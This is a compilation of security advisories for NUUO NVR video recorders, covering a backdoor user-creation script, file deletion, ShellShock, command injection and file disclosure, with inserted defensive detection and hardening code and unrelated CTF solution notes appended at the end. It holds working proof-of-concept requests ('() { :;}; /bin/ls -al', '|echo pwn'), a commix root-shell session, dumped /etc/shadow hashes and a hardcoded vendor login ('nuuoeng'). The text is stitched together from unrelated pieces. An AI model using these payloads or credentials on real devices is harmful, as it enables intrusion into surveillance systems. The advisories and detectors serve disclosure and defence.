        if (in_array($tmp['username'], $gValue['members']))
            array_push($tmp['groups'], $gValue['groupname']);
    }
    $tmp['groupsStr'] = implode(",", $tmp['groups']);
    echo $tmp['username'] . "<br>";
    echo $tmp['groupsStr'] . "<br>";
    array_push($result['users'], $tmp);
}
*/
echo "<h1> Read Passwd </h1>";
$passclass = new ReadPasswd('/etc/passwd');
echo $passclass->getAllHTML();
echo "<h1> add user </h1>";
//$output = system("adduser bbb -G poweruser -s /sbin/nologin -D -H; passwd bbb 111111");
//$output = system("adduser bbb -G poweruser -s /sbin/nologin -D -H");
$output = system("adduser bbb -G poweruser -D ");
/*
$f = popen ("/usr/bin/passwd bbb","r");
$read = fread($f, 1024);
$out = fwrite($f,"111111\n");
echo $read . " read 111 ,,, $out <br>";
$read = fread($f, 1024);
$out = fwrite($f,"111111\n");
echo $read . " read 222 ,,, $out <br>";
pclose($f);
//echo $output . " kkk <br>";
*/
$descriptorspec = array(
    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w")  // stdout is a pipe that the child will write to
);
$process = proc_open('/usr/bin/passwd bbb', $descriptorspec, $pipes);
if (is_resource($process))
{
    $read = fread($pipes[1], 1024);
    $out = fwrite($pipes[0],"111111\n");
    echo $read . " read 111 ,,, $out <br>";
    $read = fread($pipes[1], 1024);
    $out = fwrite($pipes[0],"111111\n");
    echo $read . " read 111 ,,, $out <br>";
    fclose($pipes[0]);
    fclose($pipes[1]);
}
proc_close($process);
//$handle = popen("/bin/ls", "r");
//$read = fread($handle, 1024);
//echo $read;
//pclose($handle);
?>
==================================================================
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5354
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5354.php
14.01.2016
--
#1
Read of /etc/shadow file before backdoor was enabled:
------------------------------------------------------
root@nuuo:~# cat /etc/shadow
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::
#2
Issuing GET request to the script:
-----------------------------------
GET http://10.0.0.17/strong_user.php HTTP/1.1
#3
Read of /etc/shadow file after backdoor was enabled:
-----------------------------------------------------
root@nuuo:~# cat /etc/shadow
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::
bbb:$1$gYfUNAQN$.sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7:::
#4
The backdoor account is able to read the /etc/shadow file:
-----------------------------------------------------------
login as: bbb
bbb@10.0.0.17's password:
-sh-3.2$ id
Using fallback suid method
uid=1004(bbb) gid=1000(poweruser) groups=1000(poweruser)
-sh-3.2$ cat /etc/shadow
Using fallback suid method
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::
bbb:$1$gYfUNAQN$.sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7:::
-sh-3.2$
NUUO Arbitrary File Deletion Vulnerability
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: Input passed to the 'filename' parameter in 'deletefile.php' is not properly
sanitised before being used to delete files. This can be exploited to delete files
with the permissions of the web server using their absolute path or via directory
traversal sequences passed within the affected POST/GET parameter.
==================================================================
/deletefile.php:
----------------
<?php
$filename=$_POST['filename'];
unlink($filename);
if (file_exists($filename))
    echo "fail";
else echo "true";
?>
==================================================================
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5353
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5353.php
14.01.2016
--
POST /deletefile.php HTTP/1.1
Host: 10.0.0.17
Content-Length: x
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close
filename=He_molested_murdered_and_mutilated_her.mp4
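A hardened replacement for the deletefile.php listing above, added here as an example rather than NUUO code: it confines deletions to one directory (UPLOAD_ROOT, a hypothetical path), resolves symlinks before comparing, and requires an authenticated session (the `$_SESSION['authenticated']` flag is a placeholder for the application's own login check).

```php
<?php
// Added example, not NUUO code: a hardened deletefile.php. Assumptions:
// deletions are only legitimate inside UPLOAD_ROOT (hypothetical path) and
// the surrounding application marks logged-in sessions with a flag.
declare(strict_types=1);

const UPLOAD_ROOT = '/var/www/exports'; // hypothetical allowed directory

// Resolve the user-supplied name to a real path and confirm it stays inside
// $root. Returns null for traversal sequences, absolute paths, symlinks that
// escape the root, and files that do not exist.
function resolve_deletable_path(string $root, string $filename): ?string
{
    // Only the basename is honoured: "../../etc/passwd" collapses to "passwd".
    $name = basename($filename);
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    $rootReal = realpath($root);
    $target   = realpath($root . DIRECTORY_SEPARATOR . $name);
    if ($rootReal === false || $target === false) {
        return null;
    }
    // realpath() follows symlinks, so a link pointing outside the root is caught here.
    if (strpos($target, $rootReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return is_file($target) ? $target : null;
}

// Same "true"/"fail" contract as the original script, but only for
// files that passed the containment check. The web server account should
// still own nothing outside UPLOAD_ROOT that it must not be able to delete.
function delete_file(string $root, string $filename): bool
{
    $path = resolve_deletable_path($root, $filename);
    if ($path === null) {
        return false;
    }
    return unlink($path);
}

if (PHP_SAPI !== 'cli') {
    session_start();
    // Accept only POST from a session that passed the application's login check.
    if ($_SERVER['REQUEST_METHOD'] !== 'POST' || empty($_SESSION['authenticated'])) {
        http_response_code(403);
        echo 'fail';
        exit;
    }
    echo delete_file(UPLOAD_ROOT, (string)($_POST['filename'] ?? '')) ? 'true' : 'fail';
} else {
    // Offline check with constructed inputs in a scratch directory.
    $tmp = sys_get_temp_dir() . '/deletefile_demo_' . bin2hex(random_bytes(4));
    mkdir($tmp);
    touch($tmp . '/clip.mp4');
    $inputs = ['clip.mp4', '../../../etc/passwd', '/etc/passwd', 'missing.mp4'];
    foreach ($inputs as $input) {
        $resolved = resolve_deletable_path($tmp, $input);
        printf("%-22s -> %s\n", $input, $resolved === null ? 'rejected' : 'allowed: ' . $resolved);
    }
    unlink($tmp . '/clip.mp4');
    rmdir($tmp);
}
```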
NUUO NVRmini 2 NE-4160 ShellShock Remote Code Execution
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: Firmware Version: 02.02.00
NVR Version: 02.02.0000.0040
Device Pack Version: 04.07.0000.0030
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffer from an authenticated ShellShock
vulnerability. This could allow an attacker to gain control over a targeted computer
if exploited successfully. The vulnerability affects Bash, a common component known
as a shell that appears in many versions of Linux and Unix.
Tested on: GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5352
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5352.php
14.01.2016
--
POST /cgi-bin/cgi_system HTTP/1.1
Host: 10.0.0.17
Content-Length: 91
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
User-Agent: () { :;}; /bin/ls -al
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://10.0.0.17/protocol_ftp.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en
Connection: close
cmd=ftp_setup&act=modify&com_port=21&pasv_port_from=1024&pasv_port_to=65535&services=enable
Response:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 15 Jan 2016 13:09:11 GMT
Server: lighttpd/1.4.28
Content-Length: 1652
drwxr-xr-x 3 root root 402 Oct 20 2014 .
drwxr-xr-x 6 root root 1024 Jan 4 22:49 ..
-rwxr-xr-x 1 root root 256564 Oct 20 2014 DaylightSavingWatcher
-rwxr-xr-x 1 root root 51376 Oct 20 2014 NuDatTool
-rwxr-xr-x 1 root root 60500 Oct 20 2014 NuDiscovery
-rwxr-xr-x 1 root root 930652 Oct 20 2014 NuHWMgn
-rwxr-xr-x 1 root root 8236 Oct 20 2014 NuNICWatcher
-rwxr-xr-x 1 root root 309 Oct 20 2014 after_mount.sh
lrwxrwxrwx 1 root root 7 Oct 20 2014 archive_mrg_mv -> lite_mv
-rwxr-xr-x 1 root root 1114844 Oct 20 2014 auto_upgrade
lrwxrwxrwx 1 root root 7 Oct 20 2014 cgi_main -> lite_mv
-rwxr-xr-x 1 root root 576992 Oct 20 2014 cgi_system
lrwxrwxrwx 1 root root 7 Oct 20 2014 ddns_update -> lite_mv
-rwxr-xr-x 1 root root 570 Oct 20 2014 getdhcpip.sh
-rwxr-xr-x 1 root root 388 Oct 20 2014 halt
drwxr-xr-x 2 root root 41 Oct 20 2014 lib
-rwxr-xr-x 1 root root 3827188 Oct 20 2014 lite_mv
-rwxr-xr-x 1 root root 15396 Oct 20 2014 nagent_mv
-rwxr-xr-x 1 root root 9836 Oct 20 2014 nu_btns
-rwxr-xr-x 1 root root 3496 Oct 20 2014 nudaemon
-rwxr-xr-x 1 root root 10616 Oct 20 2014 nufancontrol
-rwxr-xr-x 1 root root 12772 Oct 20 2014 nuklogd
-rwxr-xr-x 1 root root 392 Oct 20 2014 reboot
-rwxr-xr-x 1 root root 13144 Oct 20 2014 thwstat
FTP Setup OK
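Added example, not NUUO code: detection logic for the header-borne payload above. It scans every request header, not only User-Agent, because a CGI handler exports all of them into bash's environment, and it runs the same check over constructed access-log lines in the combined format (the first line mirrors the advisory's request).

```php
<?php
// Added example, not NUUO code: flag ShellShock-style function definitions
// in HTTP request headers, live and in constructed access-log lines.
declare(strict_types=1);

// The vulnerable bash import path is triggered by a variable value beginning
// with "() {". The pattern is deliberately unanchored so wrapped or
// whitespace-varied forms are still reported.
const SHELLSHOCK_PATTERN = '/\(\)\s*\{/';

// Returns the names of all headers whose value carries the pattern.
function shellshock_headers(array $headers): array
{
    $hits = [];
    foreach ($headers as $name => $value) {
        if (preg_match(SHELLSHOCK_PATTERN, (string)$value) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Parse one Apache/lighttpd combined-format line: client, timestamp, request
// line, status, size, then the quoted Referer and User-Agent values.
function parse_combined_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/';
    if (preg_match($re, $line, $m) !== 1) {
        return null;
    }
    return [
        'client'  => $m[1],
        'time'    => $m[2],
        'request' => $m[3],
        'status'  => (int)$m[4],
        'headers' => ['Referer' => $m[6], 'User-Agent' => $m[7]],
    ];
}

// Run the header check over every parseable line; returns one alert per hit.
function scan_log(array $lines): array
{
    $alerts = [];
    foreach ($lines as $n => $line) {
        $entry = parse_combined_line($line);
        if ($entry === null) {
            continue;
        }
        $hits = shellshock_headers($entry['headers']);
        if ($hits !== []) {
            $alerts[] = sprintf('line %d: %s "%s" via %s',
                $n + 1, $entry['client'], $entry['request'], implode(',', $hits));
        }
    }
    return $alerts;
}

// Constructed sample lines; the first mirrors the advisory's request, the
// third carries the payload in Referer rather than User-Agent.
$sample = [
    '10.0.0.5 - - [15/Jan/2016:13:09:11 +0000] "POST /cgi-bin/cgi_system HTTP/1.1" 200 1652 "http://10.0.0.17/protocol_ftp.php" "() { :;}; /bin/ls -al"',
    '10.0.0.6 - - [15/Jan/2016:13:10:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1) Chrome/49.0"',
    '10.0.0.7 - - [15/Jan/2016:13:11:40 +0000] "GET /cgi-bin/cgi_system HTTP/1.1" 200 88 "() { :; }; /usr/bin/id" "curl/7.47.0"',
];
foreach (scan_log($sample) as $alert) {
    echo $alert, PHP_EOL;
}

// Live request path: refuse the request before any CGI handler sees it
// (getallheaders() is only available under a web SAPI).
if (PHP_SAPI !== 'cli' && function_exists('getallheaders')) {
    $hits = shellshock_headers(getallheaders());
    if ($hits !== []) {
        error_log('ShellShock pattern in header(s): ' . implode(', ', $hits));
        http_response_code(400);
        exit;
    }
}
```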
NUUO Multiple OS Command Injection Vulnerabilities
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040, NT-4040(R))
DP: <=04.07.0000.0030, <=04.03.0000.0035
FW: <=02.02.00, <=1.7.0
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes fully equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
NUUO Titan NVR is NUUO's Linux-based open platform recording solution. It is built
on a Linux foundation, with cross-platform Windows and Mac client software. It supports
up to 64 channels of megapixel recording with 250 Mbps throughput. It also comes with
a myriad of features that are sure to fulfill even the most demanding projects. It supports
over 2300 camera models from over 100 vendors.
Desc: NUUO NVRmini, NVRmini2, Crystal, NVRSolo and NVRTitan suffer from multiple
authenticated OS command injection vulnerabilities. These can be exploited to inject
and execute arbitrary shell commands as the root user.
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
lighttpd/1.4.35
PHP/5.5.3
PHP/5.6.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5351
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5351.php
14.01.2016
--
NVRTitan:
POST /handle_iscsi.php HTTP/1.1
Host: 10.0.0.17
Content-Length: x
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://10.0.0.17/iscsi.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=c9fdced9e8129eb4c14e3154cd0e0ce3; lang=en; loginName=admin
Connection: close
act=discover&address=1.1.1.1|echo%20pwn&port=3260
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Connection: close
Date: Mon, 18 Apr 2016 08:52:17 GMT
Server: lighttpd/1.4.35
Content-Length: x
pwn
============================================================
NVRmini/2/Solo/Crystal:
GET /cgi-bin/cgi_system?cmd=raid_setup&act=getsmartinfo&devname=|ping%20-n%200%20localhost&rand=1452765315144 HTTP/1.1
Host: 10.0.0.17
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Referer: http://10.0.0.17/raid.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en
Connection: close
---
POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1
Host: 10.0.0.17
Content-Length: 97
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://10.0.0.17
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://10.0.0.17/save_config.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en
Connection: close
bfolder=%2Fmtd%2Fblock3&bfile=|ping%20-n%200%20localhost&inc_emap=no&inc_pos=no
---
Sample session from commix:
Shell > whoami
root
Shell > ls
Default.ini EMap PatrolOpt003.xml PatrolOpt009.xml PatrolOpt015.xml access apcupsd authority.lic auto_upgrade.ini autoarchive.ini camera.ini cameraparam.ini cmsserver.ini cmsstat daylightsaving.ini ddns.ini dualstreaming.ini email.ini eventaction.ini ezNUUO iobox.ini lenssetting.ini lighttpd-inc.conf lighttpd.conf liveserver.ini notice.ini nuservice.conf pos proftpd-inc.conf pushnotification raid_info.xml recordingmode.ini schedule.ini scheduler_dio.ini scheduler_motion.ini smb-inc.conf version.xml
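The three injection points above (address, devname, bfile) all reach a shell through a value the backend never validated. The following added example (not NUUO's code nor the advisory's) shows the two checks a defender wants: a detector that URL-decodes the parameters of those endpoints and flags shell metacharacters, and the positive allow-lists (assumed here, not from the vendor) that should have been enforced on each parameter before it reached a shell. The sample requests are constructed from the advisory's own PoCs.

```python
"""Detection and allow-list validation for the NUUO command injection points
shown in the advisory above. Added example, not NUUO's code."""
import re
from urllib.parse import parse_qsl, urlsplit

# Endpoints and the parameters the advisory shows being passed to a shell.
WATCHED = {
    "/handle_iscsi.php": {"address", "port"},
    "/cgi-bin/cgi_system": {"devname", "bfolder", "bfile"},
}

# Characters that let a value escape its intended argument in sh.
SHELL_META = re.compile(r"[|;&`$(){}<>\n]")

# Assumed positive allow-lists a hardened backend would enforce instead.
VALIDATORS = {
    "address": re.compile(r"^(\d{1,3}(\.\d{1,3}){3}|[A-Za-z0-9.-]{1,253})$"),
    "port": re.compile(r"^\d{1,5}$"),
    "devname": re.compile(r"^/dev/[a-z]+\d*$"),
    "bfolder": re.compile(r"^/mtd/block\d+$"),
    "bfile": re.compile(r"^[A-Za-z0-9_.-]+$"),
}


def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, params); the query
    string and a form body are merged into one decoded parameter dict."""
    head, _, body = raw.partition("\n\n")
    request_line = head.splitlines()[0]
    method, target, _ = request_line.split(" ", 2)
    parts = urlsplit(target)
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    if method == "POST":
        params.update(parse_qsl(body.strip(), keep_blank_values=True))
    return method, parts.path, params


def findings(raw: str):
    """Return a list of (param, decoded value, reason) for suspicious values
    on the watched endpoints; an empty list means the request looks clean."""
    _, path, params = parse_request(raw)
    watched = WATCHED.get(path, set())
    out = []
    for name, value in params.items():
        if name not in watched:
            continue
        if SHELL_META.search(value):
            out.append((name, value, "shell metacharacter"))
        elif name in VALIDATORS and not VALIDATORS[name].match(value):
            out.append((name, value, "fails allow-list"))
    return out


# Constructed sample requests mirroring the advisory's three injection points
# plus one benign request for the same endpoint.
SAMPLES = {
    "iscsi": "POST /handle_iscsi.php HTTP/1.1\nHost: 10.0.0.17\n\n"
             "act=discover&address=1.1.1.1|echo%20pwn&port=3260",
    "smart": "GET /cgi-bin/cgi_system?cmd=raid_setup&act=getsmartinfo"
             "&devname=|ping%20-n%200%20localhost&rand=1 HTTP/1.1\n"
             "Host: 10.0.0.17\n\n",
    "save": "POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1\nHost: 10.0.0.17\n\n"
            "bfolder=%2Fmtd%2Fblock3&bfile=|ping%20-n%200%20localhost&inc_emap=no",
    "benign": "GET /cgi-bin/cgi_system?cmd=raid_setup&act=getsmartinfo"
              "&devname=/dev/sda&rand=1 HTTP/1.1\nHost: 10.0.0.17\n\n",
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, findings(raw))
```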
NUUO Local File Disclosure Vulnerability
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes fully equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffer from a file disclosure
vulnerability: input passed through the 'css' parameter of the 'css_parser.php' script
is not properly verified before being used to include files. This can be exploited
to disclose the contents of files from local resources.
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5350
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5350.php
14.01.2016
--
Request:
--------
GET http://10.0.0.17/css_parser.php?css=__nvr_dat_tool___.php HTTP/1.1
Response:
---------
<?php
include('utils.php');
header("Expires: Thu, 19 Nov 1981 08:52:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0");
header("Pragma: no-cache");
session_start();
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>DatTool</title>
</head>
<body>
<?php
if (isset($_POST) && isset($_POST['username']) && isset($_POST['password']))
{
if ($_POST['username'] != 'nuuoeng' || $_POST['password'] != 'qwe23622260')
{
exit(0);
}
if (isset($_POST['act']) && $_POST['act'] == 'checkdat')
{
echo '<script language="javascript">';
echo 'alert("The system will start to repair videos right after system reboot. Please go to Setting Page to reboot system manually.")';
echo '</script>';
touch(constant("FLASH_FOLDER")."/checkdat");
}
?>
<p>Click the Repair button to repair the recorded videos became black due to incorrect video format. It may take a long time to repair videos, which depends on the amount of video files.</p>
<form method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>" name="form0">
<input type="hidden" name="username" value="<?php echo $_POST['username']; ?>">
<input type="hidden" name="password" value="<?php echo htmlspecialchars( $_POST['password'] ); ?>">
<input type="hidden" name="act" value="checkdat">
<input type="submit" value="Repair" name="submit" >
</form>
<?php
}
else
{
?>
<form method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>" name="form0">
Usermame: <input type="text" size="15" name="username" value=""><br />
Password: <input type="password" size="15" name="password" value=""><br />
<input type="submit" value="Submit" name="submit" >
</form>
<?php
}
?>
</body>
</html>
============================================================================
Request:
--------
GET http://10.0.0.17/css_parser.php?css=css_parser.php HTTP/1.1
Response:
---------
<?php
if(!isset($_GET['css']))exit('/* please supply a "css" parameter */');
$filename=$_GET['css'];
if(strpos($filename,'..')!==false)exit('/* please use an absolute address for your css */');
$filename=$_SERVER['DOCUMENT_ROOT'].'/'.$filename;
if(!file_exists($filename))exit('/* referred css file does not exist */');
header('content-type:text/css');
header("Expires: ".gmdate("D, d M Y H:i:s", (time()+900)) . " GMT");
$matches=array();
$names=array();
$values=array();
$file=file_get_contents($filename);
foreach ($_GET as $key=>$value)
{
//echo "Key: $key; Value: $value <br/>\n ";
if ($key != 'css')
{
$file = str_replace($key,$value,$file);
}
//system("echo \"Key: $key; Value: $value <br/>\n \" >> $filename");
}
echo $file;
/*
foreach(array_reverse($matches[0]) as $match){
$match=preg_replace('/\s+/',' ',rtrim(ltrim($match)));
$names[]=preg_replace('/\s.*//*','',$match);
$values[]=preg_replace('/^[^\s]*\s/','',$match);
}
*/
?>
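The disclosed css_parser.php only refuses '..' and then prefixes DOCUMENT_ROOT, so any readable file under the web root (the PHP sources above included) is served. As an added example, not NUUO's code, the following models that check against a constructed document root and puts a canonicalising allow-list check beside it; the hardened check also covers a symlink inside the css directory, a case the '..' test cannot see.

```python
"""Model of css_parser.php's path check versus a hardened one.
Added example, not NUUO's code; the document root is constructed."""
import os
import tempfile


def nuuo_check(docroot: str, css: str):
    """Model of the original: refuse '..', then serve DOCUMENT_ROOT/<css>
    if it exists. Any file under the web root qualifies, PHP sources
    included, because neither extension nor location is checked."""
    if ".." in css:
        return None
    path = docroot + "/" + css            # same string concat as the PHP
    return path if os.path.exists(path) else None


def hardened_check(docroot: str, css: str):
    """Serve only a real .css file that canonicalises to inside
    DOCUMENT_ROOT/css. realpath() follows symlinks and collapses '..',
    so the decision is made on where the file actually is."""
    if os.path.isabs(css) or not css.endswith(".css"):
        return None
    css_dir = os.path.realpath(os.path.join(docroot, "css"))
    real = os.path.realpath(docroot + "/" + css)
    if os.path.commonpath([css_dir, real]) != css_dir:
        return None
    return real if os.path.isfile(real) else None


def build_docroot() -> str:
    """Constructed web root: one stylesheet, stand-ins for the two PHP files
    the advisory shows being disclosed, and a symlink in css/ that points
    outside the css directory."""
    root = tempfile.mkdtemp(prefix="nvr-docroot-")
    os.makedirs(os.path.join(root, "css"))
    with open(os.path.join(root, "css", "style.css"), "w") as f:
        f.write("body { color: #000; }\n")
    for name in ("css_parser.php", "__nvr_dat_tool___.php"):
        with open(os.path.join(root, name), "w") as f:
            f.write("<?php /* constructed stand-in for the real source */ ?>\n")
    try:
        os.symlink("../css_parser.php", os.path.join(root, "css", "evil.css"))
    except OSError:
        pass  # platforms without symlink support skip that case
    return root


def symlink_present(docroot: str) -> bool:
    return os.path.islink(os.path.join(docroot, "css", "evil.css"))


def compare(docroot: str, css: str):
    """(served by the original check, served by the hardened check)"""
    return (nuuo_check(docroot, css) is not None,
            hardened_check(docroot, css) is not None)


if __name__ == "__main__":
    root = build_docroot()
    for req in ("css/style.css", "__nvr_dat_tool___.php", "css_parser.php",
                "../../../etc/passwd", "css/evil.css"):
        orig, hard = compare(root, req)
        print(f"{req:25s} original={orig!s:5} hardened={hard}")
```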
crypto
vigenere
Brute-forcing on the site https://www.boxentriq.com/code-braking/vigenere-cipher gives key: asterism.
Decrypt with it to get the flag.
Alternatively:
From the title "Vigenere" we know it is a Vigenère cipher.
Crack it with an online decoding tool:
https://guballa.de/vigenere-solver
Flag: flag{53D613FC-6C5C-4DD6-B3CE-8BC867C6F648}
pwn
supercall
A simple stack overflow: use LibcSearcher to find the libc base address from the real address of _IO_2_1_stdin_ that the challenge leaks, then use one_gadget to get a shell.
